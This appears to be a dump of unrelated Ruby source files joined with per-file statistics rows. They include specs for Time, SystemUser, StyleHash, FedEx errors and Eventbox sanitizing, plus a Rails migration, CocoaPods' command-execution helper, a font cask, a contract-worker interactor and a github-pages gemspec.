t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime("-01:00")
t.should == Time.new(2007, 1, 9, 11, 0, 0, -3600)
t.utc_offset.should == -3600
end
describe "with an argument that responds to #to_str" do
it "coerces using #to_str" do
o = mock('string')
o.should_receive(:to_str).and_return("+01:00")
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime(o)
t.should == Time.new(2007, 1, 9, 13, 0, 0, 3600)
t.utc_offset.should == 3600
end
end
it "raises ArgumentError if the String argument is not of the form (+|-)HH:MM" do
t = Time.now
lambda { t.localtime("3600") }.should raise_error(ArgumentError)
end
it "raises ArgumentError if the String argument is not in an ASCII-compatible encoding" do
t = Time.now
lambda { t.localtime("-01:00".encode("UTF-16LE")) }.should raise_error(ArgumentError)
end
it "raises ArgumentError if the argument represents a value less than or equal to -86400 seconds" do
t = Time.new
t.localtime(-86400 + 1).utc_offset.should == (-86400 + 1)
lambda { t.localtime(-86400) }.should raise_error(ArgumentError)
end
it "raises ArgumentError if the argument represents a value greater than or equal to 86400 seconds" do
t = Time.new
t.localtime(86400 - 1).utc_offset.should == (86400 - 1)
lambda { t.localtime(86400) }.should raise_error(ArgumentError)
end
end
end
| 34.903846 | 106 | 0.610193 |
39f8292f398f7a2550c991a429c6dfcef224d6b7 | 2,983 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe SystemUser, type: :model do
let(:system_user) { User.system }
describe '#grant_privileges' do
before do
expect(system_user.admin).to be_falsey
expect(system_user.status).to eq(User::STATUSES[:active])
system_user.grant_privileges
end
it 'grant admin rights' do
expect(system_user.admin).to be_truthy
end
end
describe '#remove_privileges' do
before do
system_user.admin = true
system_user.save
system_user.remove_privileges
end
it 'removes admin rights' do
expect(system_user.admin).to be_falsey
end
end
describe '#run_given' do
let(:project) { FactoryBot.create(:project_with_types, public: false) }
let(:user) { FactoryBot.build(:user) }
let(:role) { FactoryBot.create(:role, permissions: [:view_work_packages]) }
let(:member) {
FactoryBot.build(:member, project: project,
roles: [role],
principal: user)
}
let(:status) { FactoryBot.create(:status) }
let(:issue) {
FactoryBot.build(:work_package, type: project.types.first,
author: user,
project: project,
status: status)
}
before do
issue.save!
@u = system_user
end
it 'runs block with SystemUser' do
expect(@u.admin?).to be_falsey
before_user = User.current
@u.run_given do
issue.done_ratio = 50
issue.save
end
expect(issue.done_ratio).to eq(50)
expect(issue.journals.last.user).to eq(@u)
expect(@u.admin?).to be_falsey
expect(User.current).to eq(before_user)
end
end
end
| 31.072917 | 91 | 0.658733 |
1a42786beb9751f44b1a50aede27b7e681557713 | 127 | # frozen_string_literal: true
require 'problem_details/document'
require 'problem_details/version'
module ProblemDetails
end
| 15.875 | 34 | 0.84252 |
381271e60ef8cec8ea6edf0437da522a4afb250c | 856 | # This migration comes from pwb (originally 20170716075456)
class CreatePwbPages < ActiveRecord::Migration[5.0]
def change
create_table :pwb_pages do |t|
t.string :slug
t.string :setup_id
# t.string :link_key
# t.string :link_path
t.boolean :visible, default: false
t.integer :last_updated_by_user_id
t.integer :flags, default: 0, index: true, null: false
t.json :details, default: {}
t.integer :sort_order_top_nav, default: 0
t.integer :sort_order_footer, default: 0
t.boolean :show_in_top_nav, default: false, index: true
t.boolean :show_in_footer, default: false, index: true
# t.boolean :key, :string, index: true
t.timestamps null: false
end
# add_index :pwb_pages, :link_key, :unique => true
add_index :pwb_pages, :slug, :unique => true
end
end
| 34.24 | 61 | 0.670561 |
1d348ee7cc5cd45c21113b44bd78b5516feee4b4 | 1,652 | require 'spec_helper'
include Arbre::Html
describe StyleHash do
describe "initializer" do
it "should be able to be initialized without arguments" do
hash = StyleHash.new
expect(hash).to be_empty
end
it "should be able to be initialized with a hash" do
hash = StyleHash.new('one' => 'two')
expect(hash.to_s).to eql('one: two;')
end
it "should be able to be initialized with a string containing a style definition" do
hash = StyleHash.new('one: two; three:four;')
expect(hash.to_s).to eql('one: two; three: four;')
end
it "should convert to dash-case when initialized with a hash" do
hash = StyleHash.new('styleOne' => 'two')
expect(hash.to_s).to eql('style-one: two;')
end
end
describe '#style' do
it "should be an alias to itself" do
hash = StyleHash.new('one:two;')
expect(hash.style).to be(hash)
end
end
describe '[]=' do
it "should convert the used name to dash-case" do
hash = StyleHash.new
hash[:style_one] = 'one'
hash[:style_two] = 'two'
hash['style-three'] = 'three'
hash['styleFour'] = 'four'
expect(hash.to_s).to eql('style-one: one; style-two: two; style-three: three; style-four: four;')
end
end
describe '[]' do
it "should convert the used name to dash-case" do
hash = StyleHash.new('style-one: one; style-two: two; style-three: three; style-four: four;')
expect(hash[:style_one]).to eql('one')
expect(hash[:style_two]).to eql('two')
expect(hash['style-three']).to eql('three')
expect(hash['styleFour']).to eql('four')
end
end
end
| 28.482759 | 103 | 0.626513 |
e92fe0705f7803f2e808897f00543e0f301292c2 | 1,512 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "FedEx Error" do
before(:each) do
setup_fedex_responses
end
it "should handle blank response errors" do
use_fedex_response(:blank)
lambda { new_fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "The response from FedEx was blank.")
end
it "should pass through malformed errors" do
use_fedex_response(:malformed, :content_type => "")
lambda { new_fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "The response from FedEx was malformed and was not in a valid XML format.")
end
it "should pass through authentication errors" do
use_fedex_response(:failed_authentication)
fedex = Shippinglogic::FedEx.new("", "", "", "")
lambda { fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "Authentication Failed")
end
it "should pass through unexpected errors" do
use_fedex_response(:unexpected)
lambda { new_fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "There was a problem with your fedex request, and " +
"we couldn't locate a specific error message. This means your response was in an unexpected format. You might try glancing at the raw response " +
"by using the 'response' method on this error object.")
end
end
| 48.774194 | 202 | 0.743386 |
e9c6927c852fcb53e05e21c91d3ccb31abcb77de | 687 | cask "font-fira-mono-nerd-font" do
version "2.1.0"
sha256 "f4e966bddbbd85826c72b5d6dfcf3c2857095f2e2819784b5babc2a95a544d38"
url "https://github.com/ryanoasis/nerd-fonts/releases/download/v#{version}/FiraMono.zip"
appcast "https://github.com/ryanoasis/nerd-fonts/releases.atom"
name "FiraMono Nerd Font (Fira)"
homepage "https://github.com/ryanoasis/nerd-fonts"
font "Fira Mono Bold Nerd Font Complete.otf"
font "Fira Mono Medium Nerd Font Complete.otf"
font "Fira Mono Regular Nerd Font Complete.otf"
font "Fira Mono Bold Nerd Font Complete Mono.otf"
font "Fira Mono Medium Nerd Font Complete Mono.otf"
font "Fira Mono Regular Nerd Font Complete Mono.otf"
end
| 40.411765 | 90 | 0.765648 |
08efaaf3ecc5f33ce2e649e928e404115042de19 | 4,688 | module Pod
# Module which provides support for running executables.
#
# In a class it can be used as:
#
# extend Executable
# executable :git
#
# This will create two methods `git` and `git!` both accept a command but
# the later will raise on non successful executions. The methods return the
# output of the command.
#
module Executable
# Creates the methods for the executable with the given name.
#
# @param [Symbol] name
# the name of the executable.
#
# @return [void]
#
def executable(name)
define_method(name) do |*command|
Executable.execute_command(name, Array(command).flatten, false)
end
define_method(name.to_s + '!') do |*command|
Executable.execute_command(name, Array(command).flatten, true)
end
end
# Executes the given command displaying it if in verbose mode.
#
# @param [String] bin
# The binary to use.
#
# @param [Array<#to_s>] command
# The command to send to the binary.
#
# @param [Bool] raise_on_failure
# Whether it should raise if the command fails.
#
# @raise If the executable could not be located.
#
# @raise If the command fails and the `raise_on_failure` is set to true.
#
# @return [String] the output of the command (STDOUT and STDERR).
#
# @todo Find a way to display the live output of the commands.
#
def self.execute_command(executable, command, raise_on_failure)
bin = which(executable)
raise Informative, "Unable to locate the executable `#{executable}`" unless bin
require 'shellwords'
command = command.map(&:to_s)
full_command = "#{bin} #{command.join(' ')}"
if Config.instance.verbose?
UI.message("$ #{full_command}")
stdout, stderr = Indenter.new(STDOUT), Indenter.new(STDERR)
else
stdout, stderr = Indenter.new, Indenter.new
end
status = popen3(bin, command, stdout, stderr)
output = stdout.join + stderr.join
unless status.success?
if raise_on_failure
raise Informative, "#{full_command}\n\n#{output}"
else
UI.message("[!] Failed: #{full_command}".red)
end
end
output
end
# Returns the absolute path to the binary with the given name on the current
# `PATH`, or `nil` if none is found.
#
# @param [String] program
# The name of the program being searched for.
#
# @return [String,Nil] The absolute path to the given program, or `nil` if
# it wasn't found in the current `PATH`.
#
def self.which(program)
program = program.to_s
ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
bin = File.expand_path(program, path)
if File.file?(bin) && File.executable?(bin)
return bin
end
end
nil
end
private
def self.popen3(bin, command, stdout, stderr)
require 'open3'
Open3.popen3(bin, *command) do |i, o, e, t|
reader(o, stdout)
reader(e, stderr)
i.close
status = t.value
o.flush
e.flush
sleep(0.01)
status
end
end
def self.reader(input, output)
Thread.new do
buf = ''
begin
loop do
buf << input.readpartial(4096)
loop do
string, separator, buf = buf.partition(/[\r\n]/)
if separator.empty?
buf = string
break
end
output << (string << separator)
end
end
rescue EOFError
output << (buf << $/) unless buf.empty?
end
end
end
#-------------------------------------------------------------------------#
# Helper class that allows to write to an {IO} instance taking into account
# the UI indentation level.
#
class Indenter < ::Array
# @return [Fixnum] The indentation level of the UI.
#
attr_accessor :indent
# @return [IO] the {IO} to which the output should be printed.
#
attr_accessor :io
# Init a new Indenter
#
# @param [IO] io @see io
#
def initialize(io = nil)
@io = io
@indent = ' ' * UI.indentation_level
end
# Stores a portion of the output and prints it to the {IO} instance.
#
# @param [String] value
# the output to print.
#
# @return [void]
#
def <<(value)
super
io << "#{ indent }#{ value }" if io
end
end
end
end
| 26.788571 | 85 | 0.555034 |
870addeae32554a4e9df794278a17c003a0251e9 | 1,772 | # encoding: utf-8
require 'spec_helper'
describe Github::Client::Orgs::Members, '#member?' do
let(:org) { 'github' }
let(:member) { 'peter-murach' }
let(:body) { "" }
before {
stub_get(request_path).to_return(:body => body, :status => status,
:headers => {:content_type => "application/json; charset=utf-8"})
}
after { reset_authentication_for(subject) }
context "when private" do
let(:request_path) { "/orgs/#{org}/members/#{member}" }
context "this repo is being watched by the user" do
let(:status) { 404 }
it { expect { subject.member? }.to raise_error(ArgumentError) }
it "should fail validation " do
expect { subject.member? org }.to raise_error(ArgumentError)
end
it "should return false if resource not found" do
membership = subject.member? org, member
membership.should be_false
end
end
context 'user is member of an organization' do
let(:status) { 204 }
it "should return true if resoure found" do
membership = subject.member? org, member
membership.should be_true
end
end
end
context 'when public' do
let(:request_path) { "/orgs/#{org}/public_members/#{member}" }
context "this repo is being watched by the user" do
let(:status) { 404 }
it "should return false if resource not found" do
public_member = subject.member? org, member, public: true
public_member.should be_false
end
end
context 'user is member of an organization' do
let(:status) { 204 }
it "should return true if resoure found" do
public_member = subject.member? org, member, public: true
public_member.should be_true
end
end
end
end # member?
| 26.447761 | 71 | 0.633747 |
1a20db5d08e2eaa32942cbeebec5aa83ac3f2d0a | 599 | require 'helper'
class TestIpsumTime < Minitest::Test
def test_paragraph
assert_match /1\+|[ a-z]+/i, Faker::IpsumTime.paragraph
end
def test_sentence
assert_match /1\+|[ a-z]+\./i, Faker::IpsumTime.sentence
end
def test_paragraphs
assert_match /1\+|[ a-z]+/i, Faker::IpsumTime.paragraphs.join(" ")
end
def test_sentences
assert_match /1\+|[ a-z]+/i, Faker::IpsumTime.sentences.join(" ")
end
def test_words
assert_match /1\+|[ a-z]+/i, Faker::IpsumTime.words.join(" ")
end
def test_word
assert_match /1\+|[a-z]+/i, Faker::IpsumTime.word
end
end
| 21.392857 | 70 | 0.657763 |
f7191a14e05c3a01af83ea7ed2289c873952d5bc | 778 | =begin
This file is part of SSID.
SSID is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SSID is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with SSID. If not, see <http://www.gnu.org/licenses/>.
=end
class Announcement < ActiveRecord::Base
attr_accessor :title, :html_content
belongs_to :announceable, polymorphic: true
end
| 35.363636 | 75 | 0.789203 |
5d022d7693f00630238ee833b42769b4aa310fe0 | 6,456 | require_relative "../test_helper"
class EventboxSanitizerTest < Minitest::Test
def test_untaggable_object_intern
eb = Class.new(Eventbox) do
sync_call def go(str)
shared_object(str)
end
end.new
err = assert_raises(Eventbox::InvalidAccess) { eb.go(eb.shared_object("mutable")) }
assert_match(/not taggable/, err.to_s)
end
def test_shared_object_intern
eb = Class.new(Eventbox) do
sync_call def go(obj)
return obj.class, [shared_object([obj])]
end
sync_call def back(obj)
return obj.class, obj[0].class, obj[0][0].class
end
end.new
kl0, res = eb.go("string")
assert_equal String, kl0
assert_equal Array, res.class
assert_equal Eventbox::WrappedObject, res[0].class
kl1, kl2, kl3 = eb.back(res)
assert_equal Array, kl1
assert_equal Array, kl2
assert_equal String, kl3
end
def test_shared_object_extern
eb = Class.new(Eventbox) do
sync_call def go(obj)
return obj, obj.class, obj[0].class
end
end.new
obj = [eb.shared_object(["string"])]
res, kl1, kl2 = eb.go(obj)
assert_equal Array, kl1
assert_equal Eventbox::ExternalObject, kl2
assert_same obj[0], res[0]
assert_equal Array, res.class
assert_equal Array, res[0].class
assert_equal "string", res[0][0]
end
def test_untaggable_object_extern
eb = Class.new(Eventbox) do
end.new
err = assert_raises(Eventbox::InvalidAccess) { eb.shared_object("mutable".freeze) }
assert_match(/not taggable/, err.to_s)
err = assert_raises(Eventbox::InvalidAccess) { eb.shared_object(123) }
assert_match(/not taggable/, err.to_s)
end
def test_internal_object_invalid_access
fc = Class.new(Eventbox) do
sync_call def pr
IO.pipe
end
end.new
ios = fc.pr
assert_equal Array, ios.class
io = ios.first
assert_equal Eventbox::WrappedObject, io.class
ex = assert_raises(NoMethodError){ ios.first.close }
assert_match(/`close'/, ex.to_s)
end
class TestObject
def initialize(a, b, c)
@a = a
@b = b
@c = c
end
attr_reader :a
attr_reader :b
attr_reader :c
end
def test_dissect_instance_variables
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj.a.class, obj.b.class, obj.c.class]
end
end.new
obj = TestObject.new("abc", proc{}, IO.pipe.first)
okl, akl, bkl, ckl = eb.go(obj)
assert_equal TestObject, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal TestObject, obj.class
assert_equal String, obj.a.class
assert_equal Proc, obj.b.class
assert_equal IO, obj.c.class
end
class TestStruct < Struct.new(:a, :b, :c)
attr_accessor :x
end
def test_dissect_struct_members
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj.a.class, obj.b.class, obj.c.class, obj.x.class]
end
end.new
obj = TestStruct.new("abc", proc{}, IO.pipe.first)
obj.x = "uvw"
okl, akl, bkl, ckl, xkl = eb.go(obj)
assert_equal TestStruct, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal String, xkl
assert_equal TestStruct, obj.class
assert_equal String, obj.a.class
assert_equal Proc, obj.b.class
assert_equal IO, obj.c.class
assert_equal String, obj.x.class
end
class TestArray < Array
attr_accessor :x
end
def test_dissect_array_values
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj[0].class, obj[1].class, obj[2].class, obj.x.class]
end
end.new
obj = TestArray["abc", proc{}, IO.pipe.first]
obj.x = "uvw"
okl, akl, bkl, ckl, xkl = eb.go(obj)
assert_equal TestArray, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal String, xkl
assert_equal TestArray, obj.class
assert_equal String, obj[0].class
assert_equal Proc, obj[1].class
assert_equal IO, obj[2].class
assert_equal String, obj.x.class
end
class TestHash < Hash
attr_accessor :x
end
def test_dissect_hash_values
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj[:a].class, obj[:b].class, obj[:c].class, obj.x.class]
end
end.new
obj = TestHash[a: "abc", b: proc{}, c: IO.pipe.first]
obj.x = "uvw"
okl, akl, bkl, ckl, xkl = eb.go(obj)
assert_equal TestHash, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal String, xkl
assert_equal TestHash, obj.class
assert_equal String, obj[:a].class
assert_equal Proc, obj[:b].class
assert_equal IO, obj[:c].class
assert_equal String, obj.x.class
end
def test_dissect_struct_members_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go(Struct.new(:a).new("abc"))
assert_equal Eventbox::ExternalObject, okl
assert_equal "abc", obj.a
end
class UnmarshalableTestObject < IO
def initialize(a)
super(0)
@a = a
end
attr_reader :a
end
def test_dissect_instance_variables_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go(UnmarshalableTestObject.new("abc"))
assert_equal Eventbox::ExternalObject, okl
assert_equal "abc", obj.a
end
class UnmarshalableArray < Array
def initialize(a)
super()
@a = a
end
attr_reader :a
def _dump(v)
raise TypeError
end
end
def test_dissect_array_values_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go(UnmarshalableArray.new("abc") << "cde")
assert_equal Eventbox::ExternalObject, okl
assert_equal "abc", obj.a
assert_equal ["cde"], obj.to_a
end
def test_dissect_hash_values_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go({IO.pipe.first => "abc"})
assert_equal Eventbox::ExternalObject, okl
assert_equal ["abc"], obj.values
end
end
| 25.317647 | 87 | 0.656289 |
bf7cbef552c07778de54d7db97673a655b53f73b | 483 | # frozen_string_literal: true
# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
require 'redis'
require 'opentelemetry/sdk'
require 'minitest/autorun'
require 'fakeredis/minitest'
# global opentelemetry-sdk setup:
EXPORTER = OpenTelemetry::SDK::Trace::Export::InMemorySpanExporter.new
span_processor = OpenTelemetry::SDK::Trace::Export::SimpleSpanProcessor.new(EXPORTER)
OpenTelemetry::SDK.configure do |c|
c.add_span_processor span_processor
end
| 23 | 85 | 0.801242 |
ff66a09eab932c4c39c48d86edce646a6cf4156f | 3,480 | # frozen_string_literal: true
module MasterfilesApp
class ContractWorkerInteractor < BaseInteractor
def create_contract_worker(params) # rubocop:disable Metrics/AbcSize
res = validate_contract_worker_params(params)
return validation_failed_response(res) if res.failure?
id = nil
repo.transaction do
id = repo.create_contract_worker(res)
log_status(:contract_workers, id, 'CREATED')
log_transaction
end
instance = contract_worker(id)
success_response("Created contract worker #{instance.first_name}", instance)
rescue Sequel::UniqueConstraintViolation
validation_failed_response(OpenStruct.new(messages: { first_name: ['This contract worker already exists'] }))
rescue Crossbeams::InfoError => e
failed_response(e.message)
end
def update_contract_worker(id, params)
res = validate_contract_worker_params(params)
return validation_failed_response(res) if res.failure?
repo.transaction do
repo.update_contract_worker(id, res)
log_transaction
end
instance = contract_worker(id)
success_response("Updated contract worker #{instance.first_name}", instance)
rescue Crossbeams::InfoError => e
failed_response(e.message)
end
def delete_contract_worker(id)
name = contract_worker(id).first_name
repo.transaction do
repo.delete_contract_worker(id)
log_status(:contract_workers, id, 'DELETED')
log_transaction
end
success_response("Deleted contract worker #{name}")
rescue Crossbeams::InfoError => e
failed_response(e.message)
end
def assert_permission!(task, id = nil)
res = TaskPermissionCheck::ContractWorker.call(task, id)
raise Crossbeams::TaskNotPermittedError, res.message unless res.success
end
def assert_personnel_identifier_permission!(task, id = nil)
res = TaskPermissionCheck::PersonnelIdentifier.call(task, id)
raise Crossbeams::TaskNotPermittedError, res.message unless res.success
end
def de_link_personnel_identifier(id)
contract_worker_id = repo.find_contract_worker_id_by_identifier_id(id)
repo.transaction do
repo.update_contract_worker(contract_worker_id, personnel_identifier_id: nil)
repo.update(:personnel_identifiers, id, in_use: false)
# log status?
end
success_response('Successfully de-linked identifier from worker', in_use: false, contract_worker: nil)
end
def link_to_personnel_identifier(id, params) # rubocop:disable Metrics/AbcSize
res = validate_contract_worker_link_params(params.merge(id: id))
return validation_failed_response(res) if res.failure?
repo.transaction do
repo.update_contract_worker(params[:contract_worker_id], personnel_identifier_id: id)
repo.update(:personnel_identifiers, id, in_use: true)
# log status?
end
success_response('Successfully linked identifier to worker', in_use: true, contract_worker: contract_worker(params[:contract_worker_id])[:contract_worker_name])
end
private
def repo
@repo ||= HumanResourcesRepo.new
end
def contract_worker(id)
repo.find_contract_worker(id)
end
def validate_contract_worker_params(params)
ContractWorkerSchema.call(params)
end
def validate_contract_worker_link_params(params)
ContractWorkerLinkSchema.call(params)
end
end
end
| 33.786408 | 166 | 0.724138 |
5dd48ec66f6e49e54827e71aca7c3a999a7299ff | 7,186 | # -*- encoding: utf-8 -*-
# stub: github-pages 168 ruby lib
Gem::Specification.new do |s|
s.name = "github-pages".freeze
s.version = "168"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2017-11-06"
s.description = "Bootstrap the GitHub Pages Jekyll environment locally.".freeze
s.email = "[email protected]".freeze
s.executables = ["github-pages".freeze]
s.files = ["bin/github-pages".freeze]
s.homepage = "https://github.com/github/pages-gem".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0.0".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Track GitHub Pages dependencies.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<jekyll>.freeze, ["= 3.6.2"])
s.add_runtime_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.0"])
s.add_runtime_dependency(%q<kramdown>.freeze, ["= 1.14.0"])
s.add_runtime_dependency(%q<liquid>.freeze, ["= 4.0.0"])
s.add_runtime_dependency(%q<rouge>.freeze, ["= 2.2.1"])
s.add_runtime_dependency(%q<github-pages-health-check>.freeze, ["= 1.3.5"])
s.add_runtime_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.12.1"])
s.add_runtime_dependency(%q<jekyll-sitemap>.freeze, ["= 1.1.1"])
s.add_runtime_dependency(%q<jekyll-feed>.freeze, ["= 0.9.2"])
s.add_runtime_dependency(%q<jekyll-gist>.freeze, ["= 1.4.1"])
s.add_runtime_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.0.2"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.3.0"])
s.add_runtime_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.9.3"])
s.add_runtime_dependency(%q<jekyll-avatar>.freeze, ["= 0.5.0"])
s.add_runtime_dependency(%q<jemoji>.freeze, ["= 0.8.1"])
s.add_runtime_dependency(%q<jekyll-mentions>.freeze, ["= 1.2.0"])
s.add_runtime_dependency(%q<jekyll-relative-links>.freeze, ["= 0.5.1"])
s.add_runtime_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.2.0"])
s.add_runtime_dependency(%q<jekyll-readme-index>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_runtime_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.4.0"])
s.add_runtime_dependency(%q<listen>.freeze, ["= 3.0.6"])
s.add_runtime_dependency(%q<activesupport>.freeze, ["= 4.2.9"])
s.add_runtime_dependency(%q<minima>.freeze, ["= 2.1.1"])
s.add_runtime_dependency(%q<jekyll-swiss>.freeze, ["= 0.4.0"])
s.add_runtime_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.2"])
s.add_runtime_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.0"])
s.add_runtime_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_runtime_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_development_dependency(%q<rainbow>.freeze, ["~> 2.1.0"])
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_development_dependency(%q<rubocop>.freeze, ["~> 0.4"])
else
s.add_dependency(%q<jekyll>.freeze, ["= 3.6.2"])
s.add_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.0"])
s.add_dependency(%q<kramdown>.freeze, ["= 1.14.0"])
s.add_dependency(%q<liquid>.freeze, ["= 4.0.0"])
s.add_dependency(%q<rouge>.freeze, ["= 2.2.1"])
s.add_dependency(%q<github-pages-health-check>.freeze, ["= 1.3.5"])
s.add_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.12.1"])
s.add_dependency(%q<jekyll-sitemap>.freeze, ["= 1.1.1"])
s.add_dependency(%q<jekyll-feed>.freeze, ["= 0.9.2"])
s.add_dependency(%q<jekyll-gist>.freeze, ["= 1.4.1"])
s.add_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.0.2"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.3.0"])
s.add_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.9.3"])
s.add_dependency(%q<jekyll-avatar>.freeze, ["= 0.5.0"])
s.add_dependency(%q<jemoji>.freeze, ["= 0.8.1"])
s.add_dependency(%q<jekyll-mentions>.freeze, ["= 1.2.0"])
s.add_dependency(%q<jekyll-relative-links>.freeze, ["= 0.5.1"])
s.add_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.2.0"])
s.add_dependency(%q<jekyll-readme-index>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.4.0"])
s.add_dependency(%q<listen>.freeze, ["= 3.0.6"])
s.add_dependency(%q<activesupport>.freeze, ["= 4.2.9"])
s.add_dependency(%q<minima>.freeze, ["= 2.1.1"])
s.add_dependency(%q<jekyll-swiss>.freeze, ["= 0.4.0"])
s.add_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.2"])
s.add_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.0"])
s.add_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.0"])
s.add_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.3"])
